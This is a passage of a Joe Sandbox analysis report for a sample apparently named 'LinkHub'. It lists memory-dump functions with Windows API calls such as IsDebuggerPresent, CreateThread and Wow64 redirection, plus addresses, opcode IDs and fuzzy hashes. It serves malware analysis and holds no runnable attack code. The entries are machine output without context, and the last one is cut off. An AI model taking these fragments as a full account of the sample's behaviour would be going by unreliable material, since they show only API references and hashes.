                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                                        • String ID:
                                                                                        • API String ID: 4104817828-0
                                                                                        • Opcode ID: 866e6ae5aec25aaaa81889c0dc3417b5971bd0419d1aa70718097f2651271af4
                                                                                        • Instruction ID: 4998a0ec648baae043b56394bd98f7752390192fb9de374b0069ae162f40b85c
                                                                                        • Opcode Fuzzy Hash: 866e6ae5aec25aaaa81889c0dc3417b5971bd0419d1aa70718097f2651271af4
                                                                                        • Instruction Fuzzy Hash: 45F017B15007059BC3209F56D9488A7FBECFF94720B40891FE48687A20C7B4B445CF91
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 0020333D
                                                                                          • Part of subcall function 002032E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002032FB
                                                                                          • Part of subcall function 002032E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00203312
                                                                                          • Part of subcall function 0020338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00203368,?), ref: 002033BB
                                                                                          • Part of subcall function 0020338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00203368,?), ref: 002033CE
                                                                                          • Part of subcall function 0020338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,002D2418,002D2400,?,?,?,?,?,?,00203368,?), ref: 0020343A
                                                                                          • Part of subcall function 0020338B: SetCurrentDirectoryW.KERNEL32(?,00000001,002D2418,?,?,?,?,?,?,?,00203368,?), ref: 002034BB
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00203377
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                        • String ID:
                                                                                        • API String ID: 1550534281-0
                                                                                        • Opcode ID: f4ed66f465dee3d36b1067cf9b0e608a0be8dd3a3623c206ef2a0fa697129f61
                                                                                        • Instruction ID: 65fc1e9d0388932defc793287f03121f178551bce8e33d30edf3116e37fe69c8
                                                                                        • Opcode Fuzzy Hash: f4ed66f465dee3d36b1067cf9b0e608a0be8dd3a3623c206ef2a0fa697129f61
                                                                                        • Instruction Fuzzy Hash: 67F05E31965744EFD340AFB0FD4FB2477A8A714709F044897B908860E3CBBA99689F90
                                                                                        APIs
                                                                                          • Part of subcall function 00271312: InterlockedExchange.KERNEL32(?,?), ref: 00271322
                                                                                          • Part of subcall function 00271312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00271334
                                                                                          • Part of subcall function 00271312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00271342
                                                                                          • Part of subcall function 00271312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00271350
                                                                                          • Part of subcall function 00271312: CloseHandle.KERNEL32(00000000), ref: 0027135F
                                                                                          • Part of subcall function 00271312: InterlockedExchange.KERNEL32(?,000001F6), ref: 0027136F
                                                                                          • Part of subcall function 00271312: LeaveCriticalSection.KERNEL32(00000000), ref: 00271376
                                                                                        • CloseHandle.KERNELBASE(?,?,00270BBF), ref: 00270B5D
                                                                                        • DeleteCriticalSection.KERNEL32(?,?,00270BBF), ref: 00270B83
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 2929296749-0
                                                                                        • Opcode ID: 5b89d7bbb47f8e1d5dcc6227db26e6944cfc6237a7dc9417f0df6b8457a9809a
                                                                                        • Instruction ID: f22bb92b0ac8036741dfc3a8ba53ddf2ec3fa946a2692ab2ce842d128ee11707
                                                                                        • Opcode Fuzzy Hash: 5b89d7bbb47f8e1d5dcc6227db26e6944cfc6237a7dc9417f0df6b8457a9809a
                                                                                        • Instruction Fuzzy Hash: 05E01231020612EBC7312F64F849A46BBE4BF04311F64885EE09A45821CB70A4A49F08
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 0020CEEE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Init_thread_footer
                                                                                        • String ID:
                                                                                        • API String ID: 1385522511-0
                                                                                        • Opcode ID: 9f822c5e5c61a6b2d09d7b3f17ea04727d2de0d558eb663241a382c3549373b3
                                                                                        • Instruction ID: b8163e82c3ef4c8e983e3c4ace2e716a41d0697e0582ef702e198edcb331b615
                                                                                        • Opcode Fuzzy Hash: 9f822c5e5c61a6b2d09d7b3f17ea04727d2de0d558eb663241a382c3549373b3
                                                                                        • Instruction Fuzzy Hash: 3E32D4B4A202069FDB10DF58C884BBAB7B5FF48314F25815AEC05AB292C770ED75CB95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString
                                                                                        • String ID:
                                                                                        • API String ID: 2948472770-0
                                                                                        • Opcode ID: 50627909dfc924102c65c0f9e4f9b5437c98613a8b54fc6374cf098f9f7acd75
                                                                                        • Instruction ID: 1b66e68d0612a39426c8fbe5fd570fa5332927c3c0734bad2811c57a036d5ed7
                                                                                        • Opcode Fuzzy Hash: 50627909dfc924102c65c0f9e4f9b5437c98613a8b54fc6374cf098f9f7acd75
                                                                                        • Instruction Fuzzy Hash: 69D16E74A2520ADFCB14EF98C4819EDBBB5FF48314F24415AE515AB292DB30EDA1CF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 411a0bd3b902f0c6a1a6798359d14a43867cac711357140521b29fc55c435e60
                                                                                        • Instruction ID: 8ec37c1b8eb3381f6cce23c69448c0c780ab4b866f2f433cd33c8d821c781170
                                                                                        • Opcode Fuzzy Hash: 411a0bd3b902f0c6a1a6798359d14a43867cac711357140521b29fc55c435e60
                                                                                        • Instruction Fuzzy Hash: 3251F835A20124FFDB50DF98EA40B697BB1EB86324F198274EC189B391D7719D62CB50
                                                                                        APIs
                                                                                          • Part of subcall function 0020663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0020668B,?,?,002062FA,?,00000001,?,?,00000000), ref: 0020664A
                                                                                          • Part of subcall function 0020663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0020665C
                                                                                          • Part of subcall function 0020663E: FreeLibrary.KERNEL32(00000000,?,?,0020668B,?,?,002062FA,?,00000001,?,?,00000000), ref: 0020666E
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002062FA,?,00000001,?,?,00000000), ref: 002066AB
                                                                                          • Part of subcall function 00206607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00245657,?,?,002062FA,?,00000001,?,?,00000000), ref: 00206610
                                                                                          • Part of subcall function 00206607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00206622
                                                                                          • Part of subcall function 00206607: FreeLibrary.KERNEL32(00000000,?,?,00245657,?,?,002062FA,?,00000001,?,?,00000000), ref: 00206635
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                        • String ID:
                                                                                        • API String ID: 2632591731-0
                                                                                        • Opcode ID: f8de2b9407d0b4f8396e51cd0d1a066b464ff4053f8e4c58ca5e2bdf03d7e307
                                                                                        • Instruction ID: 0d68e3cee47707a76183decdbac13c657c3d855817966655c6496a4eb6c3c582
                                                                                        • Opcode Fuzzy Hash: f8de2b9407d0b4f8396e51cd0d1a066b464ff4053f8e4c58ca5e2bdf03d7e307
                                                                                        • Instruction Fuzzy Hash: 4511EB71660305ABCF14AF60C90ABAD77A99F50710F10842DF442A61C3DE76DA35EF50
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wsopen_s
                                                                                        • String ID:
                                                                                        • API String ID: 3347428461-0
                                                                                        • Opcode ID: 936b104aeeec51369cf8decfb46f73a0d7d3589b5f2dc23c843f1bc0c2631ec3
                                                                                        • Instruction ID: ebbe215d261fd2d51dc13701d2535fbd2885eeae97f2d85d5bafa5fddb08a16c
                                                                                        • Opcode Fuzzy Hash: 936b104aeeec51369cf8decfb46f73a0d7d3589b5f2dc23c843f1bc0c2631ec3
                                                                                        • Instruction Fuzzy Hash: CA1148B591420AAFCF05DF58E94499A7BF5EF48300F114069F808AB311DA31EA21CB64
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                                        • Instruction ID: 2ad2f6ebe3370376c03dc3cebc04c080eefcbcf24ddd39edbeba89d627cac4f8
                                                                                        • Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                                        • Instruction Fuzzy Hash: 83F02D72530630B7DA313EA6BC0175A33588F42334F110727F525971D1DB74E8659AD2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 176396367-0
                                                                                        • Opcode ID: b8ac142cbef8e57ca0d44e94c2bf300d569d6418181d64f64cb2967dcc43f7d7
                                                                                        • Instruction ID: 158fe8cb9f97a717d14e07b06f68ccd3426639238fa152b818ee325104caf072
                                                                                        • Opcode Fuzzy Hash: b8ac142cbef8e57ca0d44e94c2bf300d569d6418181d64f64cb2967dcc43f7d7
                                                                                        • Instruction Fuzzy Hash: 46F0C8B36117157ED7259F68D806FA6BBA8EB44360F10812AFA1DCB1D1DB71E5308BA0
                                                                                        APIs
                                                                                        • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0027F987
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentVariable
                                                                                        • String ID:
                                                                                        • API String ID: 1431749950-0
                                                                                        • Opcode ID: 3ba68b8b6da1b747ec4c5abcecf48cd84735963c3f1afc23ecd27ac011024562
                                                                                        • Instruction ID: 41a725b131a40233aa19350249d3e3a461c0a5ae8dfa9e51508f8b5914c502a6
                                                                                        • Opcode Fuzzy Hash: 3ba68b8b6da1b747ec4c5abcecf48cd84735963c3f1afc23ecd27ac011024562
                                                                                        • Instruction Fuzzy Hash: FFF04472610215BFCB01EBA5DC86D9F77BCEF45710F004055F5099B262DA70ED61CB51
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00220165,?,?,002711D9,0000FFFF), ref: 00233BC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 620b78214540ffe7f2440501543c63c138fb5ec6ac129ec77e4b0941a76b169e
                                                                                        • Instruction ID: 95f5e57ca3c437e870b10a0a68a69868f2ca4b75a08359d8dc9f939cee89422f
                                                                                        • Opcode Fuzzy Hash: 620b78214540ffe7f2440501543c63c138fb5ec6ac129ec77e4b0941a76b169e
                                                                                        • Instruction Fuzzy Hash: 52E0E561230632B6DA20AEB2AC05B5AB64EEF013A4F144162EC04960A1CB70CF2085A0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9f6982a7b109c6d4672bd31f909caff94ae057c48e03a7e360855ac44d637c0c
                                                                                        • Instruction ID: 8dfa207fcf8f2dd1f9312017ca729ff8457fe1c8370fd5c4d8bbb1b201ca5a27
                                                                                        • Opcode Fuzzy Hash: 9f6982a7b109c6d4672bd31f909caff94ae057c48e03a7e360855ac44d637c0c
                                                                                        • Instruction Fuzzy Hash: 8CF03071125712CFDB389F64E494816B7E4FF14319315893EE5D686521C77198A0DF10
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 2638373210-0
                                                                                        • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                        • Instruction ID: d7f88a650236c1f33ec042d9654d190f444b233e4e6630a05c87eb563609bed3
                                                                                        • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                        • Instruction Fuzzy Hash: C2F0F87551020DFFDF05DF90C941E9EBBB9FB04318F208445F9159A152C376EA21ABA1
                                                                                        APIs
                                                                                        • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00203963
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_
                                                                                        • String ID:
                                                                                        • API String ID: 1144537725-0
                                                                                        • Opcode ID: 02190345ac2022c54d1c6c3a8735d565d699ad79d90a2e60afea19bccaeb0bb1
                                                                                        • Instruction ID: 87dfdbad85e5ba1cfcd42da7241e124e1f936399669a72c8d6c7683fd3be8a46
                                                                                        • Opcode Fuzzy Hash: 02190345ac2022c54d1c6c3a8735d565d699ad79d90a2e60afea19bccaeb0bb1
                                                                                        • Instruction Fuzzy Hash: 1DF03771915358DFE792DF64EC497957BBCA701708F0000E6A644A6182D7745B9CCF51
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00203A76
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 541455249-0
                                                                                        • Opcode ID: 6691eecbeaccbbb63ecc9c7ba0b9ad1c4441e248c90eb80336e433a9e01226c4
                                                                                        • Instruction ID: 72b15eea019e7e51875ec5ddd52374989047a3e3318fcb90485bb288bb45b88a
                                                                                        • Opcode Fuzzy Hash: 6691eecbeaccbbb63ecc9c7ba0b9ad1c4441e248c90eb80336e433a9e01226c4
                                                                                        • Instruction Fuzzy Hash: E3E0CD7290022457C720D358EC05FDA77DDDFC8790F454071FC05D7259D960DD809990
                                                                                        APIs
                                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0026E857
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderPath_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2987691875-0
                                                                                        • Opcode ID: ef31e86d7de7e62701efd8bd7a077340704e712b49aec964316aae8e3036b291
                                                                                        • Instruction ID: 55c43bbf88a8a69a4efc1b8e1d3e4b844fedef614ac8070109c396f561fe77bc
                                                                                        • Opcode Fuzzy Hash: ef31e86d7de7e62701efd8bd7a077340704e712b49aec964316aae8e3036b291
                                                                                        • Instruction Fuzzy Hash: 77D05EA19003282BDF60A674AC0DDFB3AACC744210F0006A178ADD3192E930EE448AF0
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000712D1,00000000,00000000,?), ref: 00271306
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: 620a8c3446433265d587af4cdebec72737ae518a2b3eff78ceec253b9dba0358
                                                                                        • Instruction ID: 59521f1727c0bd29fd0519a25b634238a39ed8cb6f36a4e3da86106d365bced2
                                                                                        • Opcode Fuzzy Hash: 620a8c3446433265d587af4cdebec72737ae518a2b3eff78ceec253b9dba0358
